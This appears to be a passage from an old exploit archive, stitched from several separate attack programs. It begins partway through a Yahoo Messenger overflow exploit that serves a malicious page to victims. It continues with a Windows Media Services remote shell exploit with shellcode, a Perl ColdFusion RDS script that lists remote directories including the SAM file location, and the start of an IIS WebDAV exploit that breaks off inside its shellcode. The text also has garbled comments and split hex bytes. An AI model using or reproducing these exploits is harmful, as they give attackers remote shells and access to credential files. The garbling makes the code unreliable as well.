unsigned char buffer[5000];
int offset=320; // <-- the offset off the buffer = 320 x NOP; (At 321 whe begin the instruction pointer change)
int fd,fd2 ,i,numbytes,sin_size; /* files descriptors */
char sd[MAXDATASIZE]; /* sd will store send text */
struct sockaddr_in server; /* server's address information */
struct sockaddr_in client; /* client's address information */
struct hostent *he; /* pointer for the host entry */
WSADATA wsdata;
WSAStartup(0x0101,&wsdata);
if (argc == 1) {
/* If no arguments we call the Usage routine and exit */
Usage(argv[0]);
return 1;
}
HandleOptions(argc,argv);
fprintf(stdout,"Creating index.html: ");
if ((fptr =fopen("index.html","w"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}
// memseting the buffers for preperation
memset(sd,0x00,MAXDATASIZE);
memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);
// whe place the a jmp ebp+0x3 instuction inside the buffer
// to jump over the eip changing bytes at the en offset
//
// <fillup x offset>jmp 0x3<eip><NOPS><shellcode>
// |____________^
buffer[offset-4]=0xeb;
buffer[offset-3]=0x03;
memcpy(buffer+offset,sraddress,4);
memcpy(buffer+offset+4,shellcode,strlen(shellcode) );
// here whe make the index.html
// whe open it again if some one connects to the exploiting server
// and send it over to the victim.
fprintf(fptr,"<!DOCTYPE HTML PUBLIC %c-//W3C//DTD HTML 4.0 Transitional//EN%c>",0x22,0x22);
fprintf(fptr,"<html>");
fprintf(fptr,"<title>Oohhh my god exploited</title>\n");
fprintf(fptr,"<body bgcolor=%cblack%c>",0x22,0x22);
fprintf(fptr,"<body>");
fprintf(fptr,"<font color=%c#C0C0C0%c size=%c2%c face=%cverdana, arial, helvetica, sans-serif%c>",
0x22,0x22,0x22,0x22,0x22,0x22);
fprintf(fptr,"<B>Dtors Security Research (DSR)</B>\n");
fprintf(fptr,"<p>Yah000 Messager Version 5.5 exploit....</p>\n");
fprintf(fptr,"<pre>");
fprintf(fptr,"<IFRAME SRC=%cymsgr:call?%s%c>Contach heaven</html></body>\x00\x00\x00",0x22,buffer,0x22);
fprintf(fptr,"<IFRAME SRC=%chttp://www.boothill-mc.com/images/skull-modsm_01.gif%c>....</html>
</body>\x00\x00\x00",0x22,0x22);
fclose(fptr); // <-- closing index.html again
// Some extra debuging information
fprintf(stdout,"Using port: %d\n",port);
fprintf(stdout,"\nStarting server http://localhost:%d: ",port);
if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */
printf("socket() error\n");
exit(1);} else {
fprintf(stderr,"Done\n");
}
server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */
memset(server.sin_zero,0,8); /* zero the rest of the structure*/
if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){
/* calls bind() */
printf("bind() error\n");
exit(-1);
}
if(listen(fd,BACKLOG) == -1){ /* calls listen() */
printf("listen() error\n");
exit(-1);
}
while(1){
sin_size=sizeof(struct sockaddr_in);
if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){
/* calls accept() */
printf("accept() error\n");
exit(1);
}
if ((he=gethostbyname(inet_ntoa(client.sin_addr)))==N ULL){
printf("gethostbyname() error\n");
exit(-1);
}
printf("You got a connection from %s (%s)\n",
inet_ntoa(client.sin_addr),he->h_name);
/* prints client's IP */
fprintf(stdout,"\nOpening index.html for remote user: ");
if ((fptr =fopen("index.html","r"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Done\n");
}
fprintf(stdout,"Sending the overflow string... ");
// reading the index.html file and sending its
// contents to the connected victim
while (!feof(fptr)) {
send(fd2,sd,strlen(sd),0);
numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr);
sd[numbytes * sizeof(char)]='\0';
}
send(fd2,sd,strlen(sd),0);
printf("\n\n\nExploit Done....\n\n\n");
printf("A shell is started @ %s :) lol\n\n\nPress any key to exit the exploit",inet_ntoa(client.sin_addr),he->h_name);
gets(sd);
exit(0);
}
return 0;
}
// [2003-06-23]
80 MS Windows Media Services Remote Exploit (MS03-022)
// Windows Media Services Remote Command Execution #2
// v. 1.0 beta
// (c) firew0rker //tN [The N0b0D1eS]
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#ifdef WIN32
#include <winsock.h>
#pragma comment(lib, "wsock32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define SOCKET int
#define DWORD uint32_t
#define ULONG unsigned long
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define closesocket close
#endif
char shellcode[]=
//"\x90\x90\x90\x90\x90\x90\x90\xCC" //A¤A«?¯ A®?¢A« A¤A?A¨
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
"\xff\x5b\x81\xeb\x4d\x43\x22\x11"
"\x8b\xc3\x05\x66\x43\x22\x11\x66"
"\xb9\x15\x03\x80\x30\xfb\x40\x67"
"\xe2\xf9\x33\xa3\xf9\xfb\x72\x66"
"\x53\x06\x04\x04\x76\x66\x37\x06"
"\x04\x04\xa8\x40\xf6\xbd\xd9\xea"
"\xf8\x66\x53\x06\x04\x04\xa8\x93"
"\xfb\xfb\x04\x04\x13\x91\xfa\xfb"
"\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e"
"\x53\x06\x04\x04\xab\x04\x6e\x37"
"\x06\x04\x04\xf0\x3b\xf4\x7f\xbe"
"\xfa\xfb\xfb\x76\x66\x3b\x06\x04"
"\x04\xa8\x40\xba\xbd\xd9\xea\xf8"
"\x66\x53\x06\x04\x04\xa8\xab\x13"
"\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05"
"\x04\x04\xab\x93\xfa\xfa\xfb\xfb"
"\x04\x6e\x4b\x06\x04\x04\xc8\x20"
"\xa8\xa8\xa8\x91\xfd\x91\xfa\x91"
"\xf9\x04\x6e\x3b\x06\x04\x04\x72"
"\x7e\xa7\x05\x04\x04\x9d\x3c\x7e"
"\x9f\x05\x04\x04\xf9\xfb\x9d\x3c"
"\x7e\x9d\x05\x04\x04\x73\xfb\x3c"
"\x7e\x93\x05\x04\x04\xfb\xfb\xfb"
"\xfb\x76\x66\x9f\x05\x04\x04\x91"
"\xeb\xa8\x04\x4e\xa7\x05\x04\x04"
"\x04\x6e\x47\x06\x04\x04\xf0\x3b"
"\x8f\xe8\x76\x6e\x9c\x05\x04\x04"
"\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46"
"\xfb\xfb\xfb\x10\x2f\x91\xfa\x04"
"\x4e\xa7\x05\x04\x04\x04\x6e\x43"
"\x06\x04\x04\xf0\x3b\xf4\x7e\x5e"
"\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04"
"\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b"
"\x05\x04\x04\xab\x76\x7e\x9f\x05"
"\x04\x04\xab\x04\x4e\xa7\x05\x04"
"\x04\x04\x6e\x4f\x06\x04\x04\x72"
"\x7e\xa3\x05\x04\x04\x07\x76\x46"
"\xf3\x05\x04\x04\xc8\x3b\x42\xbf"
"\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf"
"\x05\x04\x04\xfb\xfa\xfb\xfb\x70"
"\x7e\xa3\x05\x04\x04\x72\x7e\xbf"
"\x05\x04\x04\x72\x7e\xb3\x05\x04"
"\x04\x72\x7e\xbb\x05\x04\x04\x3c"
"\x7e\xf3\x05\x04\x04\xbf\xfb\xfb"
"\xfb\xc8\x20\x76\x7e\x03\x06\x04"
"\x04\xab\x76\x7e\xf3\x05\x04\x04"
"\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3"
"\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9"
"\xea\xf8\x7e\x53\x06\x04\x04\xab"
"\xa8\x04\x6e\x3f\x06\x04\x04\x04"
"\x4e\xa3\x05\x04\x04\x04\x6e\x57"
"\x06\x04\x04\x12\xa0\x04\x04\x04"
"\x04\x6e\x33\x06\x04\x04\x13\x76"
"\xfa\xfb\xfb\x33\xef\xfb\xfb\xac"
"\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7"
"\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe"
"\xd9\xea\xf8\xff\xdf\x78\x3f\xff"
"\xab\x9f\x9c\x04\xcd\xfb\xfb\x72"
"\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a"
"\xd7\xdf\xd8\xbe\xd9\xea\x43\xac"
"\xbe\xd9\xea\xf8\xff\xdf\x78\x3f"
"\xff\x72\xbe\x07\x9f\x9c\x72\xdd"
"\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4"
"\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d"
"\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e"
"\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa"
"\xfb\x10\x19\x72\x86\x0b\x72\x8e"
"\x17\x70\x86\xf7\x42\x6d\xfb\xfb"
"\xfb\xc9\x3b\x09\x55\x72\x86\x0f"
"\x70\x34\xd0\xb6\xf7\x70\xad\x83"
"\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6"
"\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b"
"\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe"
"\x78\x3f\xff\x10\xf1\xa2\x78\x38"
"\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0"
"\xb9\xe3\x8e\xf9\x10\xb8\x70\x89"
"\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d"
"\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b"
"\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb"
"\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6"
"\xf7\x70\xa6\xeb\x72\xf8\x78\x96"
"\xeb\xff\x70\x8e\x17\x7b\xc2\xfb"
"\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb"
"\x78\x3f\xff\xa5\xa4\x32\x39\xf7"
"\xfb\x70\x86\x0b\x12\x99\x04\x04"
"\x04\x33\xfb\xfb\xfb\x70\xbe\xeb"
"\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb"
"\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32"
"\x38\xb7\x94\x9a\x9f\xb7\x92\x99"
"\x89\x9a\x89\x82\xba\xfb\xbe\x83"
"\x92\x8f\xab\x89\x94\x98\x9e\x88"
"\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e"
"\xab\x89\x94\x98\x9e\x88\x88\xba"
"\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9"
"\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba"
"\xa8\x94\x98\x90\x9e\x8f\xba\xfb"
"\x99\x92\x95\x9f\xfb\x97\x92\x88"
"\x8f\x9e\x95\xfb\x9a\x98\x98\x9e"
"\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f"
"\x9a\x89\x8f\x8e\x8b\xfb\x98\x97"
"\x94\x88\x9e\x88\x94\x98\x90\x9e"
"\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9"
"\xc4\xfc\xff\xff\x74\xf9\x75\xf7";
const DWORD default_EIP_pos = 9992; //A¯A®A«A®A¦A¥A*A¨A¥ EIP A¢ A??£?¤A¥? A¥ (sploit)
const DWORD default_EBX_points_to = 9988; //?£A? A§ ?¢A¥A«?¬ A¢ EBX A®?¢A*A®??A¨?¢A¥A«?¬A*A® sploit
//const DWORD default_EIP_value = 0x77F8441B; //A¯A® ?*?¢A®A¬?£ A¤? . A¤.A?. JMP EDX, A¢ A¤ A*A*A®A¬ ??A«?£?§ A¥ ?*?¢A® A¢ ntdll.dll
const DWORD default_EIP_value = 0x40F01333;
//const default_EDX_points_to = 0x1000; //?*?¢A® A*A¥ A¯? A¨A£A®A¤A¨A«A®???¬
char *nsiislog_default = "/scripts/nsiislog.dll";
char sploit[default_EIP_pos+4+sizeof(shellcode)+1];
char sploitbuf[sizeof(sploit)*2];
void usage(char* argv[])
{
printf("Dicklamer (: "
"We are not responsible for the illegal use of this software.\n"
"Description: Binds shell to port 34816 (or higher if port busy).\n"
"Usage: "
"%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n"
"Supported target(s):\n"
"Windows version\t\t\t\tnsiislog.dll version\n"
"------------------------------------------------------------\n"
"2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]);
exit(0);
}
int main(int argc, char* argv[])
{
#ifdef WIN32
WSADATA wsaData;
#endif
int target_port = 80;
char *nsiislog = nsiislog_default;
int nArgIndex;
if (argc<2) usage(argv);
nArgIndex = 1;
while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-'))
{
switch (argv[nArgIndex++][1])
{
case 'p':
case 'P':
target_port = atoi(argv[nArgIndex++]);
continue;
case 'r':
case 'R':
nsiislog = argv[nArgIndex++];
continue;
default:
usage(argv);
}
}
try {
#ifdef WIN32
WSAStartup(0x0101, &wsaData);
#endif
SOCKET s = socket(AF_INET,SOCK_STREAM,0);
if (s == INVALID_SOCKET) throw("No socket");
sockaddr_in addr;
//A?A¯? A¥A¤A¥A«?¯A¥A¬ A¤? A¥?? ??A¥? A¢ A?
ULONG iaddr = inet_addr(argv[1]);
if (iaddr == INADDR_NONE) {//A€A¤? A¥?? - A¨A¬?¯ ??A¥? A¢ A?
hostent *ph = gethostbyname(argv[1]);
if (!ph) throw("Cant resolve hostname");
memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr));
} else {//A€A¤? A¥?? - IP
memcpy(&addr.sin_addr.s_addr,&iaddr,4);
};
addr.sin_family = AF_INET;
addr.sin_port = htons(target_port);
int sizeofaddr=sizeof(addr);
char *req = "MX_STATS_LogLine: ";
strcpy(sploit, req);
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req));
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*?£A?? ?¢?¬ \0*/);
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*?£A?? ?¢?¬ \0*/);
//A¯? A¨ A¯A¥? A¥?¥A®A¤A¥ A* EIP, EBX A??£A¤A¥?¢ ?£A? A§?«A¢ ?¢?¬ A* A¯A®??A«A¥A¤A*A¨A© DWORD A* ?¨A¥A£A® A§ A¯? A®?? , A£A¤A¥ JZ/JNZ
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value);
/*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/
sploit[sizeof(sploit)-1] = 0;
if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host");
sprintf(sploitbuf,
"POST %s HTTP/1.0\r\n"
"Accept: */*\r\n"
"User-Agent: NSPlayer/4.1.0.3917\r\n"
"Content-Type: text/plain\r\n"
"Content-Length: %i\r\n"
"Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n"
"\r\n%s\r\n",
nsiislog,strlen(sploit),sploit);
int snd=send(s,sploitbuf,strlen(sploitbuf),0);
if (snd == strlen(sploitbuf)) printf("Target exploited.\n");
else throw("Cant send exploit");
closesocket(s);
}
catch (char *errmsg)
{
printf("%s\n",errmsg);
return -1;
}
catch (int err_n)
{
printf("error %i\n",err_n);
return err_n;
}
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
// [2003-07-01]
80 ColdFusion MX Remote Development Service Exploit
#!/usr/bin/perl
# RDS_c_Dump.pl
# By angry packet
##
# THIS IS AN UNPATCHED VULNERABILITY - THIS IS AN UNPATCHED VULNERABILITY
#
# ColdFusion 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection,
# in like one full HTTP1/1 session witin netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
#
# Due to certian current situations I am not allowed to release full exploit code with
# ( READ, RETRIEVE, WRITE ) functions.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1 :64:25773:0,02:F:7:default1:66:1187843:0,
# 02:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:20 4803:0,
# 02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security 1:65:286723:0,
# 02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67 :65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------
use strict;
use IO::Socket;
use vars qw($response @clength @rarray);
## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#2: 3:STR:7:C:/_mm/STR:1:*STR:0: Content-Length: 28
#3: 3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 47
#4: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#5: 3:STR:10:C:/_notes/STR:1:*STR:0: Content-Length: 32
#6: 5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0 Content-Length: 50
#7: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#8: 5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0: Content-Length: 51
#9: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0: Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0: Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0: Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0: Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0: Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0: Content-Length: 37
# Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know
# the $string_val.
@clength = ( "Content-Length: 46",
"Content-Length: 28",
"Content-Length: 47",
"Content-Length: 46",
#"Content-Length: 32",
#"Content-Length: 50",
"Content-Length: 46",
"Content-Length: 51",
"Content-Length: 46",
"Content-Length: 24",
"Content-Length: 46",
"Content-Length: 53",
"Content-Length: 46",
"Content-Length: 53",
"Content-Length: 46",
"Content-Length: 51",
"Content-Length: 46",
"Content-Length: 29",
"Content-Length: 46",
"Content-Length: 37"
);
@rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:7:C:/_mm/STR:1:*STR:0:",
"3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
#"3:STR:10:C:/_notes/STR:1:*STR:0:",
#"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:3:C:/STR:1:*STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
"3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
"3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
);
system("clear");
# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT = "80";
my $STRING = "C:/WINNT/repair";
my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";
print "Generating Socket with Array Directory Values.\n";
my ( $i, $c);
for ( $i = 0; $i < @rarray; $i++ ) {
for ( $c = 0; $c < @clength; $c++ ) {
if( $i == $c ) {
&gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);
}
}
}
sub gen_sock() {
my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
PeerPort => $PORT,
Proto => 'tcp',
);
die "Socket Could not be established ! $!" unless $sock;
print "Target: $TARGET:$PORT\n";
print "$POST\n";
print "Request String Value: $rarray[$i]\n";
print "$clength[$c]\n";
print "Please wait.. ..\n";
print $sock "$POST";
print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
print $sock "Host: $TARGET\r\n";
print $sock "$clength[$c]\r\n";
print $sock "Connection: Keep-Alive\r\n";
print $sock "Cache-Control: no-cache\r\n";
print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
print $sock "\r\n";
print $sock "$rarray[$i]";
# lets return and print data to term
while($response = <$sock>) {
chomp($response);
print "$response\n";
}
close($sock);
}
# [2003-07-07]
80 MS Windows WebDav III remote root Exploit (xwdav)
/*
* IIS 5.0 WebDAV Exploit Xnuxer Lab
* By Schizoprenic, Copyright (c) 2003
* WebDAV exploit without netcat or telnet and with pretty magic number as RET
*/
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#define RET 0xc9c9
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\x b1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x 95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x 99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x 99\x14"
"\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x 71\x4b"
"\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\x bc\xd9"
"\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x 99\xf3"
"\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\x d9\x99"
"\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\x d9\x99"
"\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\x bc\xd9"
"\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\x bc\xd9"
"\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x 2c\x6c"
"\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\x b4\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x a8\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x 68\xbc"
"\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\x bc\xd9"
"\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\x bf\xd9"
"\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x 5e\x1c"
"\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\x d9\x99"
"\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\x f3\x89"
"\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\x cf\xf3"
"\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x 09\xf1"
"\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\x c8\xbf"
"\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\x bd\xd9"
"\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\x ca\x66"
"\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\x d9\x99"
"\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x 99\xcf"
"\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x 99\x32"
"\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\x c9\x14"
"\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x 99\xf3"
"\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\x aa\x59"
"\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x 96\x1b"
"\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x 99\x99"
"\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x 99\xb9"
"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x 99\xc9"
"\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\x d9\x99"
"\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\x bc\xd9"
"\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x 0c\xd6"
"\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x 1e\xfe"
"\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x 2c\xc8"
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\x c9\x66"
"\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x 99\x14"
"\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x 99\x34"
"\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\x bc\xd9"
"\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x 1c\xf8"
"\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x 1c\xc8"
"\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x 66\x0c"
"\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x 70\x20"
"\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\x cf\xf1"
"\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\x c7\xc8"
"\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x 35\x1d"
"\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\x da\xd2"
